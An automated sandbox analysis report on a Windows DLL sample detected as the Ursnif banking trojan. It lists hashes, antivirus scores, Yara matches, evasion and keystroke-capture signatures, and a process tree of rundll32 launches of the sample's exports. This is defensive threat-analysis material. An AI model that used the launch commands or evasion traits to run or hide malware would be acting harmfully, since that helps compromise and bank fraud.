Play interactive tour

Edit tour

Windows Analysis Report Y0K4O5JTDz

Overview

General Information

Sample Name:	Y0K4O5JTDz (renamed file extension from none to dll)
Analysis ID:	449025
MD5:	d1253fcbf6ae056cff716ff6670c2c11
SHA1:	68a6945ac7d27651b221ba0ad10b9c3ae8c878f8
SHA256:	e2e8a185580a5831bd7ddfcbed30cb21965cfb3bd546b4cffd85dc886671aeea
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Ursnif

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

PE file contains an invalid checksum

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 4244 cmdline: loaddll32.exe 'C:\Users\user\Desktop\Y0K4O5JTDz.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 1124 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\Y0K4O5JTDz.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 240 cmdline: rundll32.exe 'C:\Users\user\Desktop\Y0K4O5JTDz.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 4708 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5872 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 2736 cmdline: rundll32.exe C:\Users\user\Desktop\Y0K4O5JTDz.dll,Connectdark MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 3216 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6104 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 5780 cmdline: rundll32.exe C:\Users\user\Desktop\Y0K4O5JTDz.dll,Mindlake MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 4944 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 2172 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 2168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 5108 cmdline: rundll32.exe C:\Users\user\Desktop\Y0K4O5JTDz.dll,Porthigh MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 1536 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5908 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 1488 cmdline: rundll32.exe C:\Users\user\Desktop\Y0K4O5JTDz.dll,Problemscale MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 5252 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4952 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 3440 cmdline: rundll32.exe C:\Users\user\Desktop\Y0K4O5JTDz.dll,WingGrass MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 4960 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 3088 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 2576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4628 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 2160 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
Y0K4O5JTDz.dll	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000D.00000002.518987950.000000006E1E1000.00000020.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000010.00000002.475060646.000000006E1E1000.00000020.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000015.00000002.493394816.000000006E1E1000.00000020.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000003.00000002.473300457.000000006E1E1000.00000020.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000018.00000002.474907412.000000006E1E1000.00000020.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
3.2.rundll32.exe.6e1e0000.1.unpack	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.6e1e0000.0.unpack	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
13.2.rundll32.exe.6e1e0000.1.unpack	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
16.2.rundll32.exe.6e1e0000.1.unpack	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
24.2.rundll32.exe.6e1e0000.1.unpack	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
2.2.rundll32.exe.6e1e0000.1.unpack	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
21.2.rundll32.exe.6e1e0000.1.unpack	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
Click to see the 2 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: Y0K4O5JTDz.dll

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: Y0K4O5JTDz.dll	Virustotal: Detection: 72%			Perma Link
Source: Y0K4O5JTDz.dll	ReversingLabs: Detection: 85%

Source: Y0K4O5JTDz.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: Y0K4O5JTDz.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: c:\938\follow-Record\Suffix\observe-element\force.pdb source: loaddll32.exe, 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.501774498.000000006E26A000.00000002.00020000.sdmp, rundll32.exe, 0000000D.00000002.519376023.000000006E26A000.00000002.00020000.sdmp, rundll32.exe, 00000010.00000002.498806396.000000006E26A000.00000002.00020000.sdmp, rundll32.exe, 00000015.00000002.514815265.000000006E26A000.00000002.00020000.sdmp, rundll32.exe, 00000018.00000002.506322569.000000006E26A000.00000002.00020000.sdmp, Y0K4O5JTDz.dll

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: Y0K4O5JTDz.dll, type: SAMPLE
Source: Yara match	File source: 3.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6e1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.518987950.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.475060646.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.493394816.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.473300457.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.474907412.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY

Source: loaddll32.exe, 00000000.00000002.472752566.0000000000B2B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: Y0K4O5JTDz.dll, type: SAMPLE
Source: Yara match	File source: 3.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6e1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.518987950.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.475060646.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.493394816.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.473300457.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.474907412.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E223E00	0_2_6E223E00
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E221C3C	0_2_6E221C3C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E2567D9	0_2_6E2567D9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E2484BB	0_2_6E2484BB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E2602BC	0_2_6E2602BC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E250396	0_2_6E250396
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E23E079	0_2_6E23E079
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E235150	0_2_6E235150
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E223E00	2_2_6E223E00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E221C3C	2_2_6E221C3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E2567D9	2_2_6E2567D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E2484BB	2_2_6E2484BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E2602BC	2_2_6E2602BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E250396	2_2_6E250396
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E23E079	2_2_6E23E079
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E235150	2_2_6E235150

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6E220990 appears 34 times
Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6E2200AC appears 100 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E220990 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E2200AC appears 100 times

Source: Y0K4O5JTDz.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal64.troj.winDLL@55/0@0/0

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6012:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5264:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6036:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5944:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6116:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5840:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5280:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4180:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:256:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2168:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1084:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2576:120:WilError_01

Source: Y0K4O5JTDz.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y0K4O5JTDz.dll,Connectdark

Source: Y0K4O5JTDz.dll	Virustotal: Detection: 72%
Source: Y0K4O5JTDz.dll	ReversingLabs: Detection: 85%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\Y0K4O5JTDz.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\Y0K4O5JTDz.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y0K4O5JTDz.dll,Connectdark
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\Y0K4O5JTDz.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y0K4O5JTDz.dll,Mindlake
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y0K4O5JTDz.dll,Porthigh
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y0K4O5JTDz.dll,Problemscale
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y0K4O5JTDz.dll,WingGrass
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\Y0K4O5JTDz.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y0K4O5JTDz.dll,Connectdark	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y0K4O5JTDz.dll,Mindlake	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y0K4O5JTDz.dll,Porthigh	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y0K4O5JTDz.dll,Problemscale	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y0K4O5JTDz.dll,WingGrass	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\Y0K4O5JTDz.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Y0K4O5JTDz.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Y0K4O5JTDz.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Y0K4O5JTDz.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Y0K4O5JTDz.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Y0K4O5JTDz.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Y0K4O5JTDz.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Y0K4O5JTDz.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: Y0K4O5JTDz.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: Y0K4O5JTDz.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Y0K4O5JTDz.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Y0K4O5JTDz.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Y0K4O5JTDz.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Y0K4O5JTDz.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: Y0K4O5JTDz.dll

Static PE information: real checksum: 0xf3990 should be: 0xf8335

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E2209D6 push ecx; ret	0_2_6E2209E9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E220075 push ecx; ret	0_2_6E220088
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E2209D6 push ecx; ret	2_2_6E2209E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E220075 push ecx; ret	2_2_6E220088

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: Y0K4O5JTDz.dll, type: SAMPLE
Source: Yara match	File source: 3.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6e1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.6e1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.518987950.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.475060646.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.493394816.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.473300457.000000006E1E1000.00000020.00020000.sdmp, type: MEMORY
